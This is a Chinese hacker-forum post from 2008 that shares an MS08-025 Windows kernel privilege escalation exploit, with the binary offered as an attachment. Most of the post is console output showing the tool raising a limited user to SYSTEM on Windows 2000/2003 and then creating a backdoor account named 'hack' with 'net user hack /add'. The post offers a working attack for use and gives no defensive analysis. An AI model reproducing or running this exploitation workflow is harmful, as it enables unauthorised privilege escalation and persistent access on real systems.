‹‹ 上一主题 | 下一主题 ››
发新话题
打印

MS08-025 For Wn2k Win2k3

richardlee

版主

Rank: 7Rank: 7Rank: 7

TopStar
1# 发表于 2008-4-26 10:37  只看该作者

MS08-025 For Wn2k Win2k3

来源:酒水不犯茶水

Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。


D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
NT AUTHORITY\SYSTEM
D:\>ms08025 “net user hack /add”
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用户帐户
——————————————————————————-
009                      Administrator            Guest
hack                     IUSR_BAICKER-VMWARE      IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>

[ 本帖最后由 richardlee 于 2008-4-27 13:49 编辑 ]
附件: 您所在的用户组无法下载或查看附件

搜索更多相关主题的帖子: 0day

因为热爱,所以选择;
因为选择,所以努力;
因为努力,所以成功!
我的小站:http://aa.bb.cc.dd.topzj.com

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题